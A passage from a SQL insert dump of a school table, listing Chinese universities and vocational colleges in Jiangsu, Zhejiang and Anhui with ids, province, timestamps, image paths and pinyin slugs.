17:40:35','/images/school/default.png','taizhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(825,'盐城卫生职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','yanchengweishengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(826,'苏州卫生职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suzhouweishengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(827,'江苏农牧科技职业学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsunongmukejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(828,'江苏食品药品职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsushipinyaopinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(829,'盐城工业职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','yanchenggongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(830,'南京城市职业学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingchengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(831,'南京机电职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingjidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(832,'苏州高博软件技术职业学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suzhougaoboruanjianjishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(833,'南京旅游职业学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjinglvyouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(834,'江苏建康职业学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsujiankangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(835,'苏州信息职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suzhouxinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(836,'宿迁泽达职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suqianzedazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(837,'苏州工业园区服务外包职业学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suzhougongyeyuanqufuwuwaibaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(838,'徐州生物工程职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','xuzhoushengwugongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(839,'江苏商贸职业学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsushangmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(840,'江苏经贸职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsujingmaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(841,'南京特殊教育师范学院','江苏省','2014-04-23 00:00:00','2017-09-04 17:14:51','/images/school/default.png','nanjingteshujiaoyuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(842,'九州职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiuzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(843,'紫琅职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zilangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(844,'硅湖职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','guihuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(845,'常州信息职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','changzhouxinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(846,'江苏联合职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsulianhezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(847,'江苏海事职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsuhaishizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(848,'应天职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','yingtianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(849,'无锡科技职业学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','wuxikejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(850,'扬州环境资源职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','yangzhouhuanjingziyuanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(851,'南通农业职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nantongnongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(852,'苏州经贸职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suzhoujingmaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(853,'苏州工业职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suzhougongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(854,'苏州托普信息职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suzhoutuopuxinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(855,'无锡商业职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','wuxishangyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(856,'南通航运职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nantonghangyunzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(857,'南京交通职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingjiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(858,'淮安信息职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','huaianxinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(859,'常州纺织服装职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','changzhoufangzhifuzhuangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(860,'苏州农业职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suzhounongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(861,'苏州工业园区职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suzhougongyeyuanquzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(862,'太湖创意职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','taihuchuangyizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(863,'炎黄职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','yanhuangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(864,'南京化工职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjinghuagongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(865,'正德职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhengdezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(866,'钟山职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhongshanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(867,'无锡南洋职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','wuxinanyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(868,'江南影视艺术职业学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangnanyingshiyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(869,'金肯职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jinkenzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(870,'常州轻工职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','changzhouqinggongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(871,'常州工程职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','changzhougongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(872,'江苏农林职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsunonglinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(873,'建东职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiandongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(874,'南京铁道职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingtiedaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(875,'徐州工业职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','xuzhougongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(876,'江苏信息职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsuxinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(877,'宿迁学院','江苏省','2014-04-23 00:00:00','2017-09-04 17:15:41','/images/school/default.png','suqianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(878,'南京信息职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingxinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(879,'江海职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jianghaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(880,'常州机电职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','changzhoujidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(881,'江阴职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangyinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(882,'无锡城市职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','wuxichengshizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(883,'无锡工艺职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','wuxigongyizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(884,'金山职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jinshanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(885,'健雄职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jianxiongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(886,'江苏财经职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsucaijingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(887,'扬州工业职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','yangzhougongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(888,'苏州港大思培科技职业学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suzhougangdasipeikejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(889,'昆山登云科技职业学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','kunshandengyunkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(890,'南京视觉艺术职业学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingshijueyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(891,'浙江大学','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangdaxue',0,NULL,NULL,0,NULL,NULL),(892,'杭州电子科技大学','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','hangzhoudianzikejidaxue',0,NULL,NULL,0,NULL,NULL),(893,'浙江工业大学','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejianggongyedaxue',0,NULL,NULL,0,NULL,NULL),(894,'浙江理工大学','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangligongdaxue',0,NULL,NULL,0,NULL,NULL),(895,'浙江农林大学','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangnonglindaxue',0,NULL,NULL,0,NULL,NULL),(896,'温州医科大学','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','wenzhouyikedaxue',0,NULL,NULL,0,NULL,NULL),(897,'浙江中医药大学','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangzhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(898,'浙江师范大学','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangshifandaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(899,'杭州师范大学','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','hangzhoushifandaxue',0,NULL,NULL,0,NULL,NULL),(900,'浙江工商大学','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejianggongshangdaxue',0,NULL,NULL,0,NULL,NULL),(901,'温州大学','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','wenzhoudaxue',0,NULL,NULL,0,NULL,NULL),(902,'浙江财经大学','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangcaijingdaxue',0,NULL,NULL,0,NULL,NULL),(903,'宁波大学','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','ningbodaxue',0,NULL,NULL,0,NULL,NULL),(904,'宁波诺丁汉大学','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','ningbonuodinghandaxue',0,NULL,NULL,0,NULL,NULL),(905,'公安海警学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','gonganhaijingxueyuan',0,NULL,NULL,0,NULL,NULL),(906,'浙江海洋大学','浙江省','2014-04-23 00:00:00','2017-09-04 17:16:10','/images/school/default.png','zhejianghaiyangxueyuan',0,NULL,NULL,0,NULL,NULL),(907,'湖州师范学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','huzhoushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(908,'绍兴文理学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shaoxingwenlixueyuan',0,NULL,NULL,0,NULL,NULL),(909,'台州学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','taizhouxueyuan',0,NULL,NULL,0,NULL,NULL),(910,'丽水学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','lishuixueyuan',0,NULL,NULL,0,NULL,NULL),(911,'嘉兴学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiaxingxueyuan',0,NULL,NULL,0,NULL,NULL),(912,'中国美术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhongguomeishuxueyuan',0,NULL,NULL,0,NULL,NULL),(913,'中国计量大学','浙江省','2014-04-23 00:00:00','2017-09-04 17:17:50','/images/school/default.png','zhongguojiliangxueyuan',0,NULL,NULL,0,NULL,NULL),(914,'浙江万里学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangwanlixueyuan',0,NULL,NULL,0,NULL,NULL),(915,'浙江科技学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangkejixueyuan',0,NULL,NULL,0,NULL,NULL),(916,'宁波工程学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','ningbogongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(917,'浙江水利水电学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangshuilishuidianxueyuan',0,NULL,NULL,0,NULL,NULL),(918,'浙江警察学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangjingchaxueyuan',0,NULL,NULL,0,NULL,NULL),(919,'衢州学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','quzhouxueyuan',0,NULL,NULL,0,NULL,NULL),(920,'浙江传媒学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangchuanmeixueyuan',0,NULL,NULL,0,NULL,NULL),(921,'浙江树人学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangshurenxueyuan',0,NULL,NULL,0,NULL,NULL),(922,'浙江越秀外国语学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangyuexiuwaiguoyuxueyuan',0,NULL,NULL,0,NULL,NULL),(923,'宁波大红鹰学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','ningbodahongyingxueyuan',0,NULL,NULL,0,NULL,NULL),(924,'浙江外国语学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangwaiguoyuxueyuan',0,NULL,NULL,0,NULL,NULL),(925,'浙江医药高等专科学校','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangyiyaogaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(926,'浙江医学高等专科学校','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(927,'宁波职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','ningbozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(928,'温州职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','wenzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(929,'浙江交通职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangjiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(930,'金华职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jinhuazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(931,'浙江电力职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangdianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(932,'浙江同济科技职业学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangtongjikejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(933,'绍兴职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shaoxingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(934,'杭州科技职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','hangzhoukejizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(935,'浙江邮电职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangyoudianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(936,'宁波卫生职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','ningboweishengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(937,'台州科技职业学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','taizhoukejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(938,'浙江国际海运职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangguojihaiyunzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(939,'浙江体育职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangtiyuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(940,'温州科技职业学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','wenzhoukejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(941,'浙江汽车职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangqichezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(942,'浙江横店影视职业学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejianghengdianyingshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(943,'浙江农业商贸职业学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangnongyeshangmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(944,'宁波城市职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','ningbochengshizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(945,'浙江工商职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejianggongshangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(946,'台州职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','taizhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(947,'浙江工贸职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejianggongmaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(948,'浙江机电职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangjidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(949,'浙江建设职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangjianshezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(950,'浙江艺术职业学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(951,'浙江经贸职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangjingmaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(952,'浙江商业职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangshangyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(953,'浙江经济职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangjingjizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(954,'浙江旅游职业学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejianglvyouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(955,'浙江育英职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangyuyingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(956,'浙江警官职业学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangjingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(957,'浙江金融职业学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangjinrongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(958,'浙江工业职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejianggongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(959,'杭州职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','hangzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(960,'嘉兴职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiaxingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(961,'湖州职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','huzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(962,'衢州职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','quzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(963,'丽水职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','lishuizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(964,'浙江东方职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangdongfangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(965,'义乌工商职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','yiwugongshangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(966,'浙江纺织服装职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangfangzhifuzhuangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(967,'浙江长征职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangchangzhengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(968,'嘉兴南洋职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiaxingnanyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(969,'浙江广厦建设职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhejiangguangshajianshezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(970,'杭州万向职业技术学院','浙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','hangzhouwanxiangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(971,'合肥工业大学','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','hefeigongyedaxue',0,NULL,NULL,0,NULL,NULL),(972,'中国科学技术大学','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhongguokexuejishudaxue',0,NULL,NULL,0,NULL,NULL),(973,'安徽工业大学','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','anhuigongyedaxue',0,NULL,NULL,0,NULL,NULL),(974,'安徽大学','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','anhuidaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(975,'安徽理工大学','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','anhuiligongdaxue',0,NULL,NULL,0,NULL,NULL),(976,'安徽工程大学','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','anhuigongchengdaxue',0,NULL,NULL,0,NULL,NULL),(977,'安徽农业大学','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','anhuinongyedaxue',0,NULL,NULL,0,NULL,NULL),(978,'安徽医科大学','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','anhuiyikedaxue',0,NULL,NULL,0,NULL,NULL),(979,'安徽中医药大学','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','anhuizhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(980,'安徽师范大学','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','anhuishifandaxue',0,NULL,NULL,0,NULL,NULL),(981,'淮北师范大学','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','huaibeishifandaxue',0,NULL,NULL,0,NULL,NULL),(982,'安徽财经大学','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','anhuicaijingdaxue',0,NULL,NULL,0,NULL,NULL),(983,'安徽建筑大学','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','anhuijianzhudaxue',0,NULL,NULL,0,NULL,NULL),(984,'蚌埠医学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','bangbuyixueyuan',0,NULL,NULL,0,NULL,NULL),(985,'皖南医学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','wannanyixueyuan',0,NULL,NULL,0,NULL,NULL),(986,'阜阳师范学院','安徽省','2014-04-23 00:00:00','2015-10-16 